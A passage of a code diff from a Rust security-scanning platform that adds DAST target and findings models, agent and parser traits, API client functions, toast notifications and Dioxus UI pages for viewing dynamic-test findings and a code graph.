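    seen.len() as u32
}

fn main() {
    let mut edges = HashMap::new();
    edges.insert("handler", vec!["parse", "store"]);
    edges.insert("parse", vec!["validate"]);
    edges.insert("store", vec!["validate"]); // shared callee is counted once
    assert_eq!(blast_radius(&edges, "handler"), 3); // parse, store, validate
    assert_eq!(blast_radius(&edges, "validate"), 0);
}
```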

View File

@@ -1,12 +1,22 @@
pub mod cve;
pub mod dast;
pub mod finding;
pub mod graph;
pub mod issue;
pub mod repository;
pub mod sbom;
pub mod scan;
pub use cve::{CveAlert, CveSource};
pub use dast::{
DastAuthConfig, DastEvidence, DastFinding, DastScanPhase, DastScanRun, DastScanStatus,
DastTarget, DastTargetType, DastVulnType,
};
pub use finding::{Finding, FindingStatus, Severity};
pub use graph::{
CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind, GraphBuildRun, GraphBuildStatus,
ImpactAnalysis,
};
pub use issue::{IssueStatus, TrackerIssue, TrackerType};
pub use repository::{ScanTrigger, TrackedRepository};
pub use sbom::{SbomEntry, VulnRef};

View File

@@ -1,5 +1,5 @@
use chrono::{DateTime, Utc};
use serde::{Deserialize, Deserializer, Serialize};
use super::issue::TrackerType;
@@ -15,21 +15,64 @@ pub enum ScanTrigger {
pub struct TrackedRepository {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
#[serde(default)]
pub name: String,
#[serde(default)]
pub git_url: String,
#[serde(default = "default_branch")]
pub default_branch: String,
pub local_path: Option<String>,
pub scan_schedule: Option<String>,
#[serde(default)]
pub webhook_enabled: bool,
pub tracker_type: Option<TrackerType>,
pub tracker_owner: Option<String>,
pub tracker_repo: Option<String>,
pub last_scanned_commit: Option<String>,
#[serde(default, deserialize_with = "deserialize_findings_count")]
pub findings_count: u32,
#[serde(default = "chrono::Utc::now", deserialize_with = "deserialize_datetime")]
pub created_at: DateTime<Utc>,
#[serde(default = "chrono::Utc::now", deserialize_with = "deserialize_datetime")]
pub updated_at: DateTime<Utc>,
}
fn default_branch() -> String {
"main".to_string()
}
/// Handles datetime stored as either a BSON DateTime or an RFC 3339 string.
fn deserialize_datetime<'de, D>(deserializer: D) -> Result<DateTime<Utc>, D::Error>
where
D: Deserializer<'de>,
{
let bson = bson::Bson::deserialize(deserializer)?;
match bson {
bson::Bson::DateTime(dt) => Ok(dt.into()),
bson::Bson::String(s) => s
.parse::<DateTime<Utc>>()
.map_err(serde::de::Error::custom),
other => Err(serde::de::Error::custom(format!(
"expected DateTime or string, got: {other:?}"
))),
}
}
/// Handles findings_count stored as either a plain integer or a BSON Int64
/// which the driver may present as a map `{"low": N, "high": N, "unsigned": bool}`.
fn deserialize_findings_count<'de, D>(deserializer: D) -> Result<u32, D::Error>
where
D: Deserializer<'de>,
{
let bson = bson::Bson::deserialize(deserializer)?;
match &bson {
bson::Bson::Int32(n) => Ok(*n as u32),
bson::Bson::Int64(n) => Ok(*n as u32),
bson::Bson::Double(n) => Ok(*n as u32),
_ => Ok(0),
}
}
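`deserialize_findings_count` accepts any BSON numeric variant and defaults to zero otherwise, so legacy documents never fail the whole deserialization. The same lenient coercion, sketched over a stand-in enum (no bson dependency):

```rust
/// Stand-in for the BSON numeric variants the lenient deserializer accepts.
enum Num {
    I32(i32),
    I64(i64),
    F64(f64),
    Other,
}

/// Coerce any numeric variant to u32, defaulting to 0
/// (mirrors the fallback behavior of deserialize_findings_count).
fn lenient_count(value: Num) -> u32 {
    match value {
        Num::I32(n) => n as u32,
        Num::I64(n) => n as u32,
        Num::F64(n) => n as u32,
        Num::Other => 0,
    }
}

fn main() {
    assert_eq!(lenient_count(Num::I64(7)), 7);
    assert_eq!(lenient_count(Num::F64(3.0)), 3);
    assert_eq!(lenient_count(Num::Other), 0); // non-numeric falls back to zero
}
```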
impl TrackedRepository {
pub fn new(name: String, git_url: String) -> Self {
let now = Utc::now();

View File

@@ -11,6 +11,8 @@ pub enum ScanType {
Cve,
Gdpr,
OAuth,
Graph,
Dast,
}
impl std::fmt::Display for ScanType {
@@ -21,6 +23,8 @@ impl std::fmt::Display for ScanType {
Self::Cve => write!(f, "cve"),
Self::Gdpr => write!(f, "gdpr"),
Self::OAuth => write!(f, "oauth"),
Self::Graph => write!(f, "graph"),
Self::Dast => write!(f, "dast"),
}
}
}
@@ -41,8 +45,10 @@ pub enum ScanPhase {
SbomGeneration,
CveScanning,
PatternScanning,
GraphBuilding,
LlmTriage,
IssueCreation,
DastScanning,
Completed,
}

View File

@@ -0,0 +1,47 @@
use crate::error::CoreError;
use crate::models::dast::{DastFinding, DastTarget};
/// Context passed to DAST agents containing discovered information
#[derive(Debug, Clone, Default)]
pub struct DastContext {
/// Discovered endpoints from crawling
pub endpoints: Vec<DiscoveredEndpoint>,
/// Technologies detected during recon
pub technologies: Vec<String>,
/// Existing SAST findings for prioritization
pub sast_hints: Vec<String>,
}
/// An endpoint discovered during crawling
#[derive(Debug, Clone)]
pub struct DiscoveredEndpoint {
pub url: String,
pub method: String,
pub parameters: Vec<EndpointParameter>,
pub content_type: Option<String>,
pub requires_auth: bool,
}
/// A parameter on a discovered endpoint
#[derive(Debug, Clone)]
pub struct EndpointParameter {
pub name: String,
/// "query", "body", "header", "path", "cookie"
pub location: String,
pub param_type: Option<String>,
pub example_value: Option<String>,
}
/// Trait for DAST testing agents (injection, XSS, auth bypass, etc.)
#[allow(async_fn_in_trait)]
pub trait DastAgent: Send + Sync {
/// Agent name (e.g., "sql_injection", "xss", "auth_bypass")
fn name(&self) -> &str;
/// Run the agent against a target with discovered context
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError>;
}

View File

@@ -0,0 +1,30 @@
use std::path::Path;
use crate::error::CoreError;
use crate::models::graph::{CodeEdge, CodeNode};
/// Output from parsing a single file
#[derive(Debug, Default)]
pub struct ParseOutput {
pub nodes: Vec<CodeNode>,
pub edges: Vec<CodeEdge>,
}
/// Trait for language-specific code parsers
pub trait LanguageParser: Send + Sync {
/// Language name (e.g., "rust", "python", "javascript")
fn language(&self) -> &str;
/// File extensions this parser handles
fn extensions(&self) -> &[&str];
/// Parse a single file and extract nodes + edges
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError>;
}
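A trivial instance of the `parse_file` idea, reduced to line-based extraction of Rust `fn` items with stand-in types (no tree-sitter; it only illustrates the node-per-symbol shape a real `LanguageParser` would emit):

```rust
/// Minimal stand-in for a graph node: (qualified_name, start_line).
/// A real LanguageParser would emit full CodeNode/CodeEdge values via a proper parser.
fn parse_fn_names(file_path: &str, source: &str) -> Vec<(String, u32)> {
    let mut nodes = Vec::new();
    for (idx, line) in source.lines().enumerate() {
        let trimmed = line.trim_start();
        // Naive match on `fn name(`; misses methods in impl blocks, macros, etc.
        if let Some(rest) = trimmed
            .strip_prefix("fn ")
            .or_else(|| trimmed.strip_prefix("pub fn "))
        {
            if let Some(name) = rest.split(|c: char| c == '(' || c == '<').next() {
                nodes.push((format!("{file_path}::{}", name.trim()), idx as u32 + 1));
            }
        }
    }
    nodes
}

fn main() {
    let src = "use std::fmt;\n\npub fn alpha() {}\nfn beta<T>(x: T) {}\n";
    let nodes = parse_fn_names("src/lib.rs", src);
    assert_eq!(nodes, vec![
        ("src/lib.rs::alpha".to_string(), 3),
        ("src/lib.rs::beta".to_string(), 4),
    ]);
}
```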

View File

@@ -1,5 +1,9 @@
pub mod dast_agent;
pub mod graph_builder;
pub mod issue_tracker;
pub mod scanner;
pub use dast_agent::{DastAgent, DastContext, DiscoveredEndpoint, EndpointParameter};
pub use graph_builder::{LanguageParser, ParseOutput};
pub use issue_tracker::IssueTracker;
pub use scanner::{ScanOutput, Scanner};

View File

@@ -12,7 +12,7 @@ path = "../bin/main.rs"
workspace = true
[features]
web = ["dioxus/web", "dioxus/router", "dioxus/fullstack", "dep:web-sys", "dep:gloo-timers"]
server = [
"dioxus/server",
"dioxus/router",
@@ -43,6 +43,7 @@ thiserror = { workspace = true }
# Web-only
reqwest = { workspace = true, optional = true }
web-sys = { version = "0.3", optional = true }
gloo-timers = { version = "0.3", features = ["futures"], optional = true }
# Server-only
axum = { version = "0.8", optional = true }

View File

@@ -300,6 +300,87 @@ tr:hover {
color: var(--text-secondary);
}
/* Toast notifications */
.toast-container {
position: fixed;
top: 20px;
right: 20px;
z-index: 50;
display: flex;
flex-direction: column;
gap: 8px;
pointer-events: none;
}
.toast {
display: flex;
align-items: center;
justify-content: space-between;
gap: 12px;
min-width: 280px;
max-width: 420px;
padding: 12px 16px;
border-radius: 8px;
font-size: 14px;
font-weight: 500;
pointer-events: auto;
animation: toast-in 0.3s ease-out;
}
.toast-success {
background: rgba(34, 197, 94, 0.15);
border: 1px solid var(--success);
color: #86efac;
}
.toast-error {
background: rgba(239, 68, 68, 0.15);
border: 1px solid var(--danger);
color: #fca5a5;
}
.toast-info {
background: rgba(59, 130, 246, 0.15);
border: 1px solid var(--info);
color: #93c5fd;
}
.toast-dismiss {
background: none;
border: none;
color: inherit;
font-size: 18px;
cursor: pointer;
opacity: 0.7;
padding: 0 4px;
line-height: 1;
}
.toast-dismiss:hover {
opacity: 1;
}
@keyframes toast-in {
from {
transform: translateX(100%);
opacity: 0;
}
to {
transform: translateX(0);
opacity: 1;
}
}
/* Button click animation + disabled */
.btn:active {
transform: scale(0.95);
}
.btn:disabled {
opacity: 0.6;
cursor: not-allowed;
}
@media (max-width: 768px) {
.sidebar {
transform: translateX(-100%);

View File

@@ -20,6 +20,20 @@ pub enum Route {
SbomPage {},
#[route("/issues")]
IssuesPage {},
#[route("/graph")]
GraphIndexPage {},
#[route("/graph/:repo_id")]
GraphExplorerPage { repo_id: String },
#[route("/graph/:repo_id/impact/:finding_id")]
ImpactAnalysisPage { repo_id: String, finding_id: String },
#[route("/dast")]
DastOverviewPage {},
#[route("/dast/targets")]
DastTargetsPage {},
#[route("/dast/findings")]
DastFindingsPage {},
#[route("/dast/findings/:id")]
DastFindingDetailPage { id: String },
#[route("/settings")]
SettingsPage {},
}


@@ -2,15 +2,18 @@ use dioxus::prelude::*;
use crate::app::Route;
use crate::components::sidebar::Sidebar;
use crate::components::toast::{ToastContainer, Toasts};
#[component]
pub fn AppShell() -> Element {
use_context_provider(Toasts::new);
rsx! {
div { class: "app-shell",
Sidebar {}
main { class: "main-content",
Outlet::<Route> {}
}
ToastContainer {}
}
}
}


@@ -5,3 +5,4 @@ pub mod pagination;
pub mod severity_badge;
pub mod sidebar;
pub mod stat_card;
pub mod toast;


@@ -40,6 +40,16 @@ pub fn Sidebar() -> Element {
route: Route::IssuesPage {},
icon: rsx! { Icon { icon: BsListTask, width: 18, height: 18 } },
},
NavItem {
label: "Code Graph",
route: Route::GraphIndexPage {},
icon: rsx! { Icon { icon: BsDiagram3, width: 18, height: 18 } },
},
NavItem {
label: "DAST",
route: Route::DastOverviewPage {},
icon: rsx! { Icon { icon: BsBug, width: 18, height: 18 } },
},
NavItem {
label: "Settings",
route: Route::SettingsPage {},
@@ -58,6 +68,12 @@ pub fn Sidebar() -> Element {
{
let is_active = match (&current_route, &item.route) {
(Route::FindingDetailPage { .. }, Route::FindingsPage {}) => true,
(Route::GraphIndexPage {}, Route::GraphIndexPage {}) => true,
(Route::GraphExplorerPage { .. }, Route::GraphIndexPage {}) => true,
(Route::ImpactAnalysisPage { .. }, Route::GraphIndexPage {}) => true,
(Route::DastTargetsPage {}, Route::DastOverviewPage {}) => true,
(Route::DastFindingsPage {}, Route::DastOverviewPage {}) => true,
(Route::DastFindingDetailPage { .. }, Route::DastOverviewPage {}) => true,
(a, b) => a == b,
};
let class = if is_active { "nav-item active" } else { "nav-item" };


@@ -0,0 +1,86 @@
use dioxus::prelude::*;
#[derive(Clone, PartialEq)]
pub enum ToastType {
Success,
Error,
Info,
}
#[derive(Clone, PartialEq)]
pub struct ToastMessage {
pub id: usize,
pub message: String,
pub toast_type: ToastType,
}
#[derive(Clone, Copy)]
pub struct Toasts {
items: Signal<Vec<ToastMessage>>,
next_id: Signal<usize>,
}
impl Toasts {
pub fn new() -> Self {
Self {
items: Signal::new(vec![]),
next_id: Signal::new(0),
}
}
pub fn push(&mut self, toast_type: ToastType, message: impl Into<String>) {
let id = *self.next_id.read();
*self.next_id.write() = id + 1;
self.items.write().push(ToastMessage {
id,
message: message.into(),
toast_type,
});
#[cfg(feature = "web")]
{
let mut items = self.items;
spawn(async move {
gloo_timers::future::TimeoutFuture::new(4_000).await;
items.write().retain(|t| t.id != id);
});
}
}
pub fn remove(&mut self, id: usize) {
self.items.write().retain(|t| t.id != id);
}
}
#[component]
pub fn ToastContainer() -> Element {
let mut toasts = use_context::<Toasts>();
let items = toasts.items.read();
rsx! {
div { class: "toast-container",
for toast in items.iter() {
{
let toast_id = toast.id;
let type_class = match toast.toast_type {
ToastType::Success => "toast-success",
ToastType::Error => "toast-error",
ToastType::Info => "toast-info",
};
rsx! {
div {
key: "{toast_id}",
class: "toast {type_class}",
span { "{toast.message}" }
button {
class: "toast-dismiss",
onclick: move |_| toasts.remove(toast_id),
"\u{00d7}"
}
}
}
}
}
}
}
}
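The push/remove pair above is Signal plumbing around plain Vec bookkeeping: ids only ever increase, so the auto-dismiss task can never retain away a newer toast under a reused id. A dependency-free sketch of that invariant (hypothetical `PlainToasts`, stripped of the Signal wrapper):

```rust
// Dependency-free sketch of the Toasts bookkeeping above:
// monotonically increasing ids, retain-based removal.
// `PlainToasts` is a hypothetical stand-in for the Signal-backed struct.
struct PlainToasts {
    items: Vec<(usize, String)>,
    next_id: usize,
}

impl PlainToasts {
    fn push(&mut self, message: &str) -> usize {
        let id = self.next_id;
        self.next_id += 1; // ids are never reused, so a stale dismiss can't hit a new toast
        self.items.push((id, message.to_string()));
        id
    }

    fn remove(&mut self, id: usize) {
        // retain keeps every toast except the dismissed one, preserving order
        self.items.retain(|(tid, _)| *tid != id);
    }
}
```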


@@ -0,0 +1,125 @@
use dioxus::prelude::*;
use serde::{Deserialize, Serialize};
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct DastTargetsResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct DastScanRunsResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct DastFindingsResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct DastFindingDetailResponse {
pub data: serde_json::Value,
}
#[server]
pub async fn fetch_dast_targets() -> Result<DastTargetsResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/targets", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: DastTargetsResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_dast_scan_runs() -> Result<DastScanRunsResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/scan-runs", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: DastScanRunsResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_dast_findings() -> Result<DastFindingsResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/findings", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: DastFindingsResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_dast_finding_detail(
id: String,
) -> Result<DastFindingDetailResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/findings/{id}", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: DastFindingDetailResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn add_dast_target(
name: String,
base_url: String,
) -> Result<(), ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/targets", state.agent_api_url);
let client = reqwest::Client::new();
client
.post(&url)
.json(&serde_json::json!({
"name": name,
"base_url": base_url,
}))
.send()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?
// Propagate HTTP error statuses so the caller's error toast fires
.error_for_status()
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(())
}
#[server]
pub async fn trigger_dast_scan(target_id: String) -> Result<(), ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!(
"{}/api/v1/dast/targets/{target_id}/scan",
state.agent_api_url
);
let client = reqwest::Client::new();
client
.post(&url)
.send()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?
// Propagate HTTP error statuses so the caller's error toast fires
.error_for_status()
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(())
}
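One detail the `format!` calls above gloss over: if `agent_api_url` is configured with a trailing slash, the joined URL ends up with a double slash. A small normalizing helper (hypothetical `dast_endpoint`, not part of the diff) sketches a fix:

```rust
// Join the configured agent base URL with a DAST route, tolerating a
// trailing slash on the base. The "/api/v1/dast" prefix matches the
// format! calls in the server functions above.
fn dast_endpoint(base: &str, route: &str) -> String {
    format!("{}/api/v1/dast{}", base.trim_end_matches('/'), route)
}
```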


@@ -0,0 +1,96 @@
use dioxus::prelude::*;
use serde::{Deserialize, Serialize};
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct GraphDataResponse {
pub data: GraphData,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct GraphData {
pub build: Option<serde_json::Value>,
pub nodes: Vec<serde_json::Value>,
pub edges: Vec<serde_json::Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct ImpactResponse {
pub data: Option<serde_json::Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct CommunitiesResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct NodesResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[server]
pub async fn fetch_graph(repo_id: String) -> Result<GraphDataResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/graph/{repo_id}", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: GraphDataResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_impact(
repo_id: String,
finding_id: String,
) -> Result<ImpactResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!(
"{}/api/v1/graph/{repo_id}/impact/{finding_id}",
state.agent_api_url
);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: ImpactResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_communities(repo_id: String) -> Result<CommunitiesResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/graph/{repo_id}/communities", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: CommunitiesResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn trigger_graph_build(repo_id: String) -> Result<(), ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/graph/{repo_id}/build", state.agent_api_url);
let client = reqwest::Client::new();
client
.post(&url)
.send()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?
// Propagate HTTP error statuses so the caller's error toast fires
.error_for_status()
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(())
}


@@ -1,6 +1,8 @@
// Server function modules (compiled for both web and server;
// the #[server] macro generates client stubs for the web target)
pub mod dast;
pub mod findings;
pub mod graph;
pub mod issues;
pub mod repositories;
pub mod sbom;


@@ -0,0 +1,113 @@
use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::components::severity_badge::SeverityBadge;
use crate::infrastructure::dast::fetch_dast_finding_detail;
#[component]
pub fn DastFindingDetailPage(id: String) -> Element {
let finding = use_resource(move || {
let fid = id.clone();
async move { fetch_dast_finding_detail(fid).await.ok() }
});
rsx! {
PageHeader {
title: "DAST Finding Detail",
description: "Full evidence and details for a dynamic security finding",
}
div { class: "card",
match &*finding.read() {
Some(Some(resp)) => {
let f = resp.data.clone();
let severity = f.get("severity").and_then(|v| v.as_str()).unwrap_or("info").to_string();
rsx! {
div { class: "flex items-center gap-4 mb-4",
SeverityBadge { severity: severity }
h2 { "{f.get(\"title\").and_then(|v| v.as_str()).unwrap_or(\"Unknown Finding\")}" }
}
div { class: "grid grid-cols-2 gap-4 mb-4",
div {
strong { "Vulnerability Type: " }
span { class: "badge", "{f.get(\"vuln_type\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
div {
strong { "CWE: " }
span { "{f.get(\"cwe\").and_then(|v| v.as_str()).unwrap_or(\"N/A\")}" }
}
div {
strong { "Endpoint: " }
code { "{f.get(\"endpoint\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
div {
strong { "Method: " }
span { "{f.get(\"method\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
div {
strong { "Parameter: " }
code { "{f.get(\"parameter\").and_then(|v| v.as_str()).unwrap_or(\"N/A\")}" }
}
div {
strong { "Exploitable: " }
if f.get("exploitable").and_then(|v| v.as_bool()).unwrap_or(false) {
span { class: "badge badge-danger", "Confirmed" }
} else {
span { class: "badge", "Unconfirmed" }
}
}
}
h3 { "Description" }
p { "{f.get(\"description\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
if let Some(remediation) = f.get("remediation").and_then(|v| v.as_str()) {
h3 { class: "mt-4", "Remediation" }
p { "{remediation}" }
}
h3 { class: "mt-4", "Evidence" }
if let Some(evidence_list) = f.get("evidence").and_then(|v| v.as_array()) {
for (i, evidence) in evidence_list.iter().enumerate() {
div { class: "card mb-3",
h4 { "Evidence #{i + 1}" }
div { class: "grid grid-cols-2 gap-2",
div {
strong { "Request: " }
code { "{evidence.get(\"request_method\").and_then(|v| v.as_str()).unwrap_or(\"-\")} {evidence.get(\"request_url\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
div {
strong { "Response Status: " }
span { "{evidence.get(\"response_status\").and_then(|v| v.as_u64()).unwrap_or(0)}" }
}
}
if let Some(payload) = evidence.get("payload").and_then(|v| v.as_str()) {
div { class: "mt-2",
strong { "Payload: " }
code { class: "block bg-gray-900 text-green-400 p-2 rounded mt-1",
"{payload}"
}
}
}
if let Some(snippet) = evidence.get("response_snippet").and_then(|v| v.as_str()) {
div { class: "mt-2",
strong { "Response Snippet: " }
pre { class: "block bg-gray-900 text-gray-300 p-2 rounded mt-1 overflow-x-auto text-sm",
"{snippet}"
}
}
}
}
}
} else {
p { "No evidence collected." }
}
}
},
Some(None) => rsx! { p { "Finding not found." } },
None => rsx! { p { "Loading..." } },
}
}
}
}


@@ -0,0 +1,79 @@
use dioxus::prelude::*;
use crate::app::Route;
use crate::components::page_header::PageHeader;
use crate::components::severity_badge::SeverityBadge;
use crate::infrastructure::dast::fetch_dast_findings;
#[component]
pub fn DastFindingsPage() -> Element {
let findings = use_resource(|| async { fetch_dast_findings().await.ok() });
rsx! {
PageHeader {
title: "DAST Findings",
description: "Vulnerabilities discovered through dynamic application security testing",
}
div { class: "card",
match &*findings.read() {
Some(Some(data)) => {
let finding_list = &data.data;
if finding_list.is_empty() {
rsx! { p { "No DAST findings yet. Run a scan to discover vulnerabilities." } }
} else {
rsx! {
table { class: "table",
thead {
tr {
th { "Severity" }
th { "Type" }
th { "Title" }
th { "Endpoint" }
th { "Method" }
th { "Exploitable" }
}
}
tbody {
for finding in finding_list {
{
let id = finding.get("_id").and_then(|v| v.get("$oid")).and_then(|v| v.as_str()).unwrap_or("").to_string();
let severity = finding.get("severity").and_then(|v| v.as_str()).unwrap_or("info").to_string();
rsx! {
tr {
td { SeverityBadge { severity: severity } }
td {
span { class: "badge",
"{finding.get(\"vuln_type\").and_then(|v| v.as_str()).unwrap_or(\"-\")}"
}
}
td {
Link {
to: Route::DastFindingDetailPage { id: id },
"{finding.get(\"title\").and_then(|v| v.as_str()).unwrap_or(\"-\")}"
}
}
td { code { class: "text-sm", "{finding.get(\"endpoint\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" } }
td { "{finding.get(\"method\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td {
if finding.get("exploitable").and_then(|v| v.as_bool()).unwrap_or(false) {
span { class: "badge badge-danger", "Confirmed" }
} else {
span { class: "badge", "Unconfirmed" }
}
}
}
}
}
}
}
}
}
}
},
Some(None) => rsx! { p { "Failed to load findings." } },
None => rsx! { p { "Loading..." } },
}
}
}
}


@@ -0,0 +1,107 @@
use dioxus::prelude::*;
use crate::app::Route;
use crate::components::page_header::PageHeader;
use crate::infrastructure::dast::{fetch_dast_findings, fetch_dast_scan_runs};
#[component]
pub fn DastOverviewPage() -> Element {
let scan_runs = use_resource(|| async { fetch_dast_scan_runs().await.ok() });
let findings = use_resource(|| async { fetch_dast_findings().await.ok() });
rsx! {
PageHeader {
title: "DAST Overview",
description: "Dynamic Application Security Testing — scan running applications for vulnerabilities",
}
div { class: "grid grid-cols-3 gap-4 mb-6",
div { class: "stat-card",
div { class: "stat-value",
match &*scan_runs.read() {
Some(Some(data)) => {
let count = data.total.unwrap_or(0);
rsx! { "{count}" }
},
_ => rsx! { "" },
}
}
div { class: "stat-label", "Total Scans" }
}
div { class: "stat-card",
div { class: "stat-value",
match &*findings.read() {
Some(Some(data)) => {
let count = data.total.unwrap_or(0);
rsx! { "{count}" }
},
_ => rsx! { "" },
}
}
div { class: "stat-label", "DAST Findings" }
}
div { class: "stat-card",
div { class: "stat-value", "-" }
div { class: "stat-label", "Active Targets" }
}
}
div { class: "flex gap-4 mb-4",
Link {
to: Route::DastTargetsPage {},
class: "btn btn-primary",
"Manage Targets"
}
Link {
to: Route::DastFindingsPage {},
class: "btn btn-secondary",
"View Findings"
}
}
div { class: "card",
h3 { "Recent Scan Runs" }
match &*scan_runs.read() {
Some(Some(data)) => {
let runs = &data.data;
if runs.is_empty() {
rsx! { p { "No scan runs yet." } }
} else {
rsx! {
table { class: "table",
thead {
tr {
th { "Target" }
th { "Status" }
th { "Phase" }
th { "Findings" }
th { "Exploitable" }
th { "Started" }
}
}
tbody {
for run in runs {
tr {
td { "{run.get(\"target_id\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td {
span { class: "badge",
"{run.get(\"status\").and_then(|v| v.as_str()).unwrap_or(\"unknown\")}"
}
}
td { "{run.get(\"current_phase\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td { "{run.get(\"findings_count\").and_then(|v| v.as_u64()).unwrap_or(0)}" }
td { "{run.get(\"exploitable_count\").and_then(|v| v.as_u64()).unwrap_or(0)}" }
td { "{run.get(\"started_at\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
}
}
}
}
}
},
Some(None) => rsx! { p { "Failed to load scan runs." } },
None => rsx! { p { "Loading..." } },
}
}
}
}


@@ -0,0 +1,145 @@
use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::components::toast::{ToastType, Toasts};
use crate::infrastructure::dast::{add_dast_target, fetch_dast_targets, trigger_dast_scan};
#[component]
pub fn DastTargetsPage() -> Element {
let mut targets = use_resource(|| async { fetch_dast_targets().await.ok() });
let mut toasts = use_context::<Toasts>();
let mut show_form = use_signal(|| false);
let mut new_name = use_signal(String::new);
let mut new_url = use_signal(String::new);
rsx! {
PageHeader {
title: "DAST Targets",
description: "Configure target applications for dynamic security testing",
}
div { class: "mb-4",
button {
class: "btn btn-primary",
onclick: move |_| show_form.set(!show_form()),
if show_form() { "Cancel" } else { "Add Target" }
}
}
if show_form() {
div { class: "card mb-4",
h3 { "Add New Target" }
div { class: "form-group",
label { "Name" }
input {
class: "input",
r#type: "text",
placeholder: "My Web App",
value: "{new_name}",
oninput: move |e| new_name.set(e.value()),
}
}
div { class: "form-group",
label { "Base URL" }
input {
class: "input",
r#type: "text",
placeholder: "https://example.com",
value: "{new_url}",
oninput: move |e| new_url.set(e.value()),
}
}
button {
class: "btn btn-primary",
onclick: move |_| {
let name = new_name();
let url = new_url();
spawn(async move {
match add_dast_target(name, url).await {
Ok(_) => {
toasts.push(ToastType::Success, "Target created");
targets.restart();
}
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
});
show_form.set(false);
new_name.set(String::new());
new_url.set(String::new());
},
"Create Target"
}
}
}
div { class: "card",
h3 { "Configured Targets" }
match &*targets.read() {
Some(Some(data)) => {
let target_list = &data.data;
if target_list.is_empty() {
rsx! { p { "No DAST targets configured. Add one to get started." } }
} else {
rsx! {
table { class: "table",
thead {
tr {
th { "Name" }
th { "URL" }
